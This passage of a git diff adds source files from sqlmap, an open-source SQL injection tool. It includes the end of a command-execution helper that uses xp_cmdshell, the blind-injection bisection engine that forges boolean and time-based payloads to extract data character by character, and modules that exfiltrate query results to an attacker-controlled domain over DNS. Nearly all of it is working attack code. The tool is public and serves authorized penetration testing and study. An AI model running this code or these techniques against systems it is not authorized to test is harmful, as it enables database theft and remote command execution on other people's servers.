SqlmapUnsupportedFeatureException(errMsg) + + debugMsg = "creating a support table to write commands standard " + debugMsg += "output to" + logger.debug(debugMsg) + + # TEXT can't be used here because in error technique you get: + # "The text, ntext, and image data types cannot be compared or sorted" + self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)") + + self._xpCmdshellTest() diff --git a/src/sqlmap-master/lib/techniques/__init__.py b/src/sqlmap-master/lib/techniques/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/techniques/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/techniques/blind/__init__.py b/src/sqlmap-master/lib/techniques/blind/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/techniques/blind/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/techniques/blind/inference.py b/src/sqlmap-master/lib/techniques/blind/inference.py new file mode 100644 index 0000000..748bbbf --- /dev/null +++ b/src/sqlmap-master/lib/techniques/blind/inference.py @@ -0,0 +1,742 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import re +import time + +from lib.core.agent import agent +from lib.core.common import Backend +from lib.core.common import calculateDeltaSeconds +from lib.core.common import dataToStdout +from lib.core.common import decodeDbmsHexValue +from lib.core.common import decodeIntToUnicode +from lib.core.common import filterControlChars +from lib.core.common import getCharset +from lib.core.common import getCounter +from lib.core.common import getPartRun +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import goGoodSamaritan +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import incrementCounter +from lib.core.common import isDigit +from lib.core.common import isListLike +from lib.core.common import safeStringFormat +from lib.core.common import singleTimeWarnMessage +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import ADJUST_TIME_DELAY +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapThreadException +from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.core.settings import CHAR_INFERENCE_MARK +from lib.core.settings import INFERENCE_BLANK_BREAK +from lib.core.settings import INFERENCE_EQUALS_CHAR +from lib.core.settings import INFERENCE_GREATER_CHAR +from lib.core.settings import INFERENCE_MARKER +from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR +from lib.core.settings import INFERENCE_UNKNOWN_CHAR +from lib.core.settings import MAX_BISECTION_LENGTH +from lib.core.settings import MAX_REVALIDATION_STEPS +from lib.core.settings import NULL +from lib.core.settings import PARTIAL_HEX_VALUE_MARKER +from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import PAYLOAD_DELIMITER +from lib.core.settings import RANDOM_INTEGER_MARKER +from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.core.unescaper import unescaper +from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from lib.utils.xrange import xrange +from thirdparty import six + +def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): + """ + Bisection algorithm that can be used to perform blind SQL injection + on an affected host + """ + + abortedFlag = False + showEta = False + partialValue = u"" + finalValue = None + retrievedLength = 0 + + if payload is None: + return 0, None + + if charsetType is None and conf.charset: + asciiTbl = sorted(set(ord(_) for _ in conf.charset)) + else: + asciiTbl = getCharset(charsetType) + + threadData = getCurrentThreadData() + timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + retVal = hashDBRetrieve(expression, checkConf=True) + + if retVal: + if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal: + pass + elif PARTIAL_HEX_VALUE_MARKER in retVal: + retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") + + if retVal and conf.hexConvert: + partialValue = retVal + infoMsg = "resuming partial value: %s" % safecharencode(partialValue) + logger.info(infoMsg) + elif PARTIAL_VALUE_MARKER in retVal: + retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") + + if retVal and not conf.hexConvert: + partialValue = retVal + infoMsg = "resuming partial value: %s" % safecharencode(partialValue) + logger.info(infoMsg) + else: + infoMsg = "resumed: %s" % safecharencode(retVal) + logger.info(infoMsg) + + return 0, retVal + + if Backend.isDbms(DBMS.MCKOI): + match = re.search(r"\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I) + if match: + original = queries[Backend.getIdentifiedDbms()].inference.query + right = original.split('<')[1] + payload = payload.replace(right, "(SELECT %s FROM %s)" % (right, match.group(2).strip())) + expression = match.group(1).strip() + + elif Backend.isDbms(DBMS.FRONTBASE): + match = re.search(r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I) + if match: + payload = payload.replace(INFERENCE_GREATER_CHAR, " FROM %s)%s" % (match.group(3).strip(), INFERENCE_GREATER_CHAR)) + payload = payload.replace("SUBSTRING", "(SELECT%sSUBSTRING" % (match.group(1) if match.group(1) else " "), 1) + expression = match.group(2).strip() + + try: + # Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API + if conf.predictOutput: + kb.partRun = getPartRun() + elif conf.api: + kb.partRun = getPartRun(alias=False) + else: + kb.partRun = None + + if partialValue: + firstChar = len(partialValue) + elif re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): + firstChar = 0 + elif conf.firstChar is not None and (isinstance(conf.firstChar, int) or (hasattr(conf.firstChar, "isdigit") and conf.firstChar.isdigit())): + firstChar = int(conf.firstChar) - 1 + if kb.fileReadMode: + firstChar <<= 1 + elif hasattr(firstChar, "isdigit") and firstChar.isdigit() or isinstance(firstChar, int): + firstChar = int(firstChar) - 1 + else: + firstChar = 0 + + if re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): + lastChar = 0 + elif conf.lastChar is not None and (isinstance(conf.lastChar, int) or (hasattr(conf.lastChar, "isdigit") and conf.lastChar.isdigit())): + lastChar = int(conf.lastChar) + elif hasattr(lastChar, "isdigit") and lastChar.isdigit() or isinstance(lastChar, int): + lastChar = int(lastChar) + else: + lastChar = 0 + + if Backend.getDbms(): + _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) + nulledCastedField = agent.nullAndCastField(fieldToCastStr) + expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) + expressionUnescaped = unescaper.escape(expressionReplaced) + else: + expressionUnescaped = unescaper.escape(expression) + + if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int): + length = int(length) + else: + length = None + + if length == 0: + return 0, "" + + if length and (lastChar > 0 or firstChar > 0): + length = min(length, lastChar or length) - firstChar + + if length and length > MAX_BISECTION_LENGTH: + length = None + + showEta = conf.eta and isinstance(length, int) + + if kb.bruteMode: + numThreads = 1 + else: + numThreads = min(conf.threads or 0, length or 0) or 1 + + if showEta: + progress = ProgressBar(maxValue=length) + + if numThreads > 1: + if not timeBasedCompare or kb.forceThreads: + debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) + logger.debug(debugMsg) + else: + numThreads = 1 + + if conf.threads == 1 and not any((timeBasedCompare, conf.predictOutput)): + warnMsg = "running in a single-thread mode. Please consider " + warnMsg += "usage of option '--threads' for faster data retrieval" + singleTimeWarnMessage(warnMsg) + + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): + if isinstance(length, int) and numThreads > 1: + dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) + dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) + else: + dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) + + def tryHint(idx): + with kb.locks.hint: + hintValue = kb.hintValue + + if payload is not None and len(hintValue or "") > 0 and len(hintValue) >= idx: + if "'%s'" % CHAR_INFERENCE_MARK in payload: + posValue = hintValue[idx - 1] + else: + posValue = ord(hintValue[idx - 1]) + + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) + forgedPayload = agent.extractPayload(payload) or "" + forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)).replace(markingValue, unescapedCharValue) + result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + if result: + return hintValue[idx - 1] + + with kb.locks.hint: + kb.hintValue = "" + + return None + + def validateChar(idx, value): + """ + Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay + """ + + validationPayload = re.sub(r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload) + + if "'%s'" % CHAR_INFERENCE_MARK not in payload: + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value)) + else: + # e.g.: ... > '%c' -> ... > ORD(..) + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + + result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + + if result and timeBasedCompare and getTechniqueData().trueCode: + result = threadData.lastCode == getTechniqueData().trueCode + if not result: + warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, getTechniqueData().trueCode) + singleTimeWarnMessage(warnMsg) + + incrementCounter(getTechnique()) + + return result + + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): + """ + continuousOrder means that distance between each two neighbour's + numerical values is exactly 1 + """ + + result = tryHint(idx) + + if result: + return result + + if charTbl is None: + charTbl = type(asciiTbl)(asciiTbl) + + originalTbl = type(charTbl)(charTbl) + + if kb.disableShiftTable: + shiftTable = None + elif continuousOrder and shiftTable is None: + # Used for gradual expanding into unicode charspace + shiftTable = [2, 2, 3, 3, 3] + + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + charTbl.remove(ord(char)) + + if not charTbl: + return None + + elif len(charTbl) == 1: + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + if result: + return decodeIntToUnicode(charTbl[0]) + else: + return None + + maxChar = maxValue = charTbl[-1] + minValue = charTbl[0] + firstCheck = False + lastCheck = False + unexpectedCode = False + + if continuousOrder: + while len(charTbl) > 1: + position = None + + if charsetType is None: + if not firstCheck: + try: + try: + lastChar = [_ for _ in threadData.shared.value if _ is not None][-1] + except IndexError: + lastChar = None + else: + if 'a' <= lastChar <= 'z': + position = charTbl.index(ord('a') - 1) # 96 + elif 'A' <= lastChar <= 'Z': + position = charTbl.index(ord('A') - 1) # 64 + elif '0' <= lastChar <= '9': + position = charTbl.index(ord('0') - 1) # 47 + except ValueError: + pass + finally: + firstCheck = True + + elif not lastCheck and numThreads == 1: # not usable in multi-threading environment + if charTbl[(len(charTbl) >> 1)] < ord(' '): + try: + # favorize last char check if current value inclines toward 0 + position = charTbl.index(1) + except ValueError: + pass + finally: + lastCheck = True + + if position is None: + position = (len(charTbl) >> 1) + + posValue = charTbl[position] + falsePayload = None + + if "'%s'" % CHAR_INFERENCE_MARK not in payload: + forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) + else: + # e.g.: ... > '%c' -> ... > ORD(..) + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) + forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) + + if timeBasedCompare: + if kb.responseTimeMode: + kb.responseTimePayload = falsePayload + else: + kb.responseTimePayload = None + + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + + incrementCounter(getTechnique()) + + if not timeBasedCompare and getTechniqueData() is not None: + unexpectedCode |= threadData.lastCode not in (getTechniqueData().falseCode, getTechniqueData().trueCode) + if unexpectedCode: + if threadData.lastCode is not None: + warnMsg = "unexpected HTTP code '%s' detected." % threadData.lastCode + else: + warnMsg = "unexpected response detected." + + warnMsg += " Will use (extra) validation step in similar cases" + + singleTimeWarnMessage(warnMsg) + + if result: + minValue = posValue + + if not isinstance(charTbl, xrange): + charTbl = charTbl[position:] + else: + # xrange() - extended virtual charset used for memory/space optimization + charTbl = xrange(charTbl[position], charTbl[-1] + 1) + else: + maxValue = posValue + + if not isinstance(charTbl, xrange): + charTbl = charTbl[:position] + else: + charTbl = xrange(charTbl[0], charTbl[position]) + + if len(charTbl) == 1: + if maxValue == 1: + return None + + # Going beyond the original charset + elif minValue == maxChar: + # If the original charTbl was [0,..,127] new one + # will be [128,..,(128 << 4) - 1] or from 128 to 2047 + # and instead of making a HUGE list with all the + # elements we use a xrange, which is a virtual + # list + if expand and shiftTable: + charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) + originalTbl = xrange(charTbl) + maxChar = maxValue = charTbl[-1] + minValue = charTbl[0] + else: + kb.disableShiftTable = True + return None + else: + retVal = minValue + 1 + + if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): + if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal): + if not kb.originalTimeDelay: + kb.originalTimeDelay = conf.timeSec + + threadData.validationRun = 0 + if (retried or 0) < MAX_REVALIDATION_STEPS: + errMsg = "invalid character detected. retrying.." + logger.error(errMsg) + + if timeBasedCompare: + if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: + conf.timeSec += 1 + warnMsg = "increasing time delay to %d second%s" % (conf.timeSec, 's' if conf.timeSec > 1 else '') + logger.warning(warnMsg) + + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: + dbgMsg = "turning off time auto-adjustment mechanism" + logger.debug(dbgMsg) + kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO + + return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) + else: + errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal) + logger.error(errMsg) + conf.timeSec = kb.originalTimeDelay + return decodeIntToUnicode(retVal) + else: + if timeBasedCompare: + threadData.validationRun += 1 + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: + dbgMsg = "turning back on time auto-adjustment mechanism" + logger.debug(dbgMsg) + kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES + + return decodeIntToUnicode(retVal) + else: + return None + else: + if "'%s'" % CHAR_INFERENCE_MARK in payload and conf.charset: + errMsg = "option '--charset' is not supported on '%s'" % Backend.getIdentifiedDbms() + raise SqlmapUnsupportedFeatureException(errMsg) + + candidates = list(originalTbl) + bit = 0 + while len(candidates) > 1: + bits = {} + for candidate in candidates: + bit = 0 + while candidate: + bits.setdefault(bit, 0) + bits[bit] += 1 if candidate & 1 else -1 + candidate >>= 1 + bit += 1 + + choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0] + mask = 1 << choice + + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0)) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + if result: + candidates = [_ for _ in candidates if _ & mask > 0] + else: + candidates = [_ for _ in candidates if _ & mask == 0] + + bit += 1 + + if candidates: + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0])) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + if result: + return decodeIntToUnicode(candidates[0]) + + # Go multi-threading (--threads > 1) + if numThreads > 1 and isinstance(length, int) and length > 1: + threadData.shared.value = [None] * length + threadData.shared.index = [firstChar] # As list for python nested function scoping + threadData.shared.start = firstChar + + try: + def blindThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.index: + if threadData.shared.index[0] - firstChar >= length: + return + + threadData.shared.index[0] += 1 + currentCharIndex = threadData.shared.index[0] + + if kb.threadContinue: + val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset)) + if val is None: + val = INFERENCE_UNKNOWN_CHAR + else: + break + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4629 + if not isListLike(threadData.shared.value): + break + + with kb.locks.value: + threadData.shared.value[currentCharIndex - 1 - firstChar] = val + currentValue = list(threadData.shared.value) + + if kb.threadContinue: + if showEta: + progress.progress(threadData.shared.index[0]) + elif conf.verbose >= 1: + startCharIndex = 0 + endCharIndex = 0 + + for i in xrange(length): + if currentValue[i] is not None: + endCharIndex = max(endCharIndex, i) + + output = '' + + if endCharIndex > conf.progressWidth: + startCharIndex = endCharIndex - conf.progressWidth + + count = threadData.shared.start + + for i in xrange(startCharIndex, endCharIndex + 1): + output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ') + + for i in xrange(length): + count += 1 if currentValue[i] is not None else 0 + + if startCharIndex > 0: + output = ".." + output[2:] + + if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): + output = output[:-2] + ".." + + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): + _ = count - firstChar + output += '_' * (min(length, conf.progressWidth) - len(output)) + status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length)) + output += status if _ != length else " " * len(status) + + dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) + + runThreads(numThreads, blindThread, startThreadMsg=False) + + except KeyboardInterrupt: + abortedFlag = True + + finally: + value = [_ for _ in partialValue] + value.extend(_ for _ in threadData.shared.value) + + infoMsg = None + + # If we have got one single character not correctly fetched it + # can mean that the connection to the target URL was lost + if None in value: + partialValue = "".join(value[:value.index(None)]) + + if partialValue: + infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(partialValue)) + else: + finalValue = "".join(value) + infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) + + if conf.verbose in (1, 2) and infoMsg and not any((showEta, conf.api, kb.bruteMode)): + dataToStdout(infoMsg) + + # No multi-threading (--threads = 1) + else: + index = firstChar + threadData.shared.value = "" + + while True: + index += 1 + + # Common prediction feature (a.k.a. "good samaritan") + # NOTE: to be used only when multi-threading is not set for + # the moment + if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None: + val = None + commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl) + + # If there is one single output in common-outputs, check + # it via equal against the query output + if commonValue is not None: + # One-shot query containing equals commonValue + testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) + + query = getTechniqueData().vector + query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)%s%s" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue))) + query = agent.suffixQuery(query) + + result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + # Did we have luck? + if result: + if showEta: + progress.progress(len(commonValue)) + elif conf.verbose in (1, 2) or conf.api: + dataToStdout(filterControlChars(commonValue[index - 1:])) + + finalValue = commonValue + break + + # If there is a common pattern starting with partialValue, + # check it via equal against the substring-query output + if commonPattern is not None: + # Substring-query containing equals commonPattern + subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) + testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) + + query = getTechniqueData().vector + query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)=%s" % (subquery, testValue))) + query = agent.suffixQuery(query) + + result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + # Did we have luck? + if result: + val = commonPattern[index - 1:] + index += len(val) - 1 + + # Otherwise if there is no commonValue (single match from + # txt/common-outputs.txt) and no commonPattern + # (common pattern) use the returned common charset only + # to retrieve the query output + if not val and commonCharset: + val = getChar(index, commonCharset, False) + + # If we had no luck with commonValue and common charset, + # use the returned other charset + if not val: + val = getChar(index, otherCharset, otherCharset == asciiTbl) + else: + val = getChar(index, asciiTbl, not(charsetType is None and conf.charset)) + + if val is None: + finalValue = partialValue + break + + if kb.data.processChar: + val = kb.data.processChar(val) + + threadData.shared.value = partialValue = partialValue + val + + if showEta: + progress.progress(index) + elif (conf.verbose in (1, 2) and not kb.bruteMode) or conf.api: + dataToStdout(filterControlChars(val)) + + # Note: some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces + if Backend.getIdentifiedDbms() in (DBMS.FIREBIRD, DBMS.DB2, DBMS.MAXDB, DBMS.DERBY, DBMS.FRONTBASE) and len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace(): + finalValue = partialValue[:-INFERENCE_BLANK_BREAK] + break + elif charsetType and partialValue[-1:].isspace(): + finalValue = partialValue[:-1] + break + + if (lastChar > 0 and index >= lastChar): + finalValue = "" if length == 0 else partialValue + finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue + partialValue = None + break + + except KeyboardInterrupt: + abortedFlag = True + finally: + kb.prependFlag = False + retrievedLength = len(finalValue or "") + + if finalValue is not None: + finalValue = decodeDbmsHexValue(finalValue) if conf.hexConvert else finalValue + hashDBWrite(expression, finalValue) + elif partialValue: + hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) + + if conf.hexConvert and not any((abortedFlag, conf.api, kb.bruteMode)): + infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) + dataToStdout(infoMsg) + else: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): + dataToStdout("\n") + + if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: + infoMsg = "retrieved: %s" % filterControlChars(finalValue) + logger.info(infoMsg) + + if kb.threadException: + raise SqlmapThreadException("something unexpected happened inside the threads") + + if abortedFlag: + raise KeyboardInterrupt + + _ = finalValue or partialValue + + return getCounter(getTechnique()), safecharencode(_) if kb.safeCharEncode else _ + +def queryOutputLength(expression, payload): + """ + Returns the query output length. + """ + + infoMsg = "retrieving the length of query output" + logger.info(infoMsg) + + start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) + count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) + + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) + logger.debug(debugMsg) + + if isinstance(length, six.string_types) and length.isspace(): + length = 0 + + return length diff --git a/src/sqlmap-master/lib/techniques/dns/__init__.py b/src/sqlmap-master/lib/techniques/dns/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/techniques/dns/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/techniques/dns/test.py b/src/sqlmap-master/lib/techniques/dns/test.py new file mode 100644 index 0000000..1a8fe6a --- /dev/null +++ b/src/sqlmap-master/lib/techniques/dns/test.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import randomInt +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.exception import SqlmapNotVulnerableException +from lib.techniques.dns.use import dnsUse + +def dnsTest(payload): + logger.info("testing for data retrieval through DNS channel") + + randInt = randomInt() + kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt) + + if not kb.dnsTest: + errMsg = "data retrieval through DNS channel failed" + if not conf.forceDns: + conf.dnsDomain = None + errMsg += ". Turning off DNS exfiltration support" + logger.error(errMsg) + else: + raise SqlmapNotVulnerableException(errMsg) + else: + infoMsg = "data retrieval through DNS channel was successful" + logger.info(infoMsg) diff --git a/src/sqlmap-master/lib/techniques/dns/use.py b/src/sqlmap-master/lib/techniques/dns/use.py new file mode 100644 index 0000000..4592d73 --- /dev/null +++ b/src/sqlmap-master/lib/techniques/dns/use.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re +import time + +from lib.core.agent import agent +from lib.core.common import Backend +from lib.core.common import calculateDeltaSeconds +from lib.core.common import dataToStdout +from lib.core.common import decodeDbmsHexValue +from lib.core.common import extractRegexResult +from lib.core.common import getSQLSnippet +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import safeStringFormat +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.settings import DNS_BOUNDARIES_ALPHABET +from lib.core.settings import MAX_DNS_LABEL +from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.unescaper import unescaper +from lib.request.connect import Connect as Request +from lib.utils.safe2bin import safecharencode + +def dnsUse(payload, expression): + """ + Retrieve the output of a SQL query taking advantage of the DNS + resolution mechanism by making request back to attacker's machine. + """ + + start = time.time() + + retVal = None + count = 0 + offset = 1 + + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): + output = hashDBRetrieve(expression, checkConf=True) + + if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: + output = None + + if output is None: + kb.dnsMode = True + + while True: + count += 1 + prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) + chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 + _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) + nulledCastedField = agent.nullAndCastField(fieldToCastStr) + extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) + if extendedField != fieldToCastStr: # e.g. MIN(surname) + nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) + fieldToCastStr = extendedField + nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) + nulledCastedField = agent.hexConvertField(nulledCastedField) + expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) + + expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) + expressionUnescaped = unescaper.escape(expressionRequest) + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): + query = agent.prefixQuery("; %s" % expressionUnescaped) + query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) + forgedPayload = agent.payload(newValue=query) + else: + forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) + + Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False) + + _ = conf.dnsServer.pop(prefix, suffix) + + if _: + _ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) + _ = decodeDbmsHexValue(_) + output = (output or "") + _ + offset += len(_) + + if len(_) < chunk_length: + break + else: + break + + output = decodeDbmsHexValue(output) if conf.hexConvert else output + + kb.dnsMode = False + + if output is not None: + retVal = output + + if kb.dnsTest is not None: + dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) + + if count > 0: + hashDBWrite(expression, output) + + if not 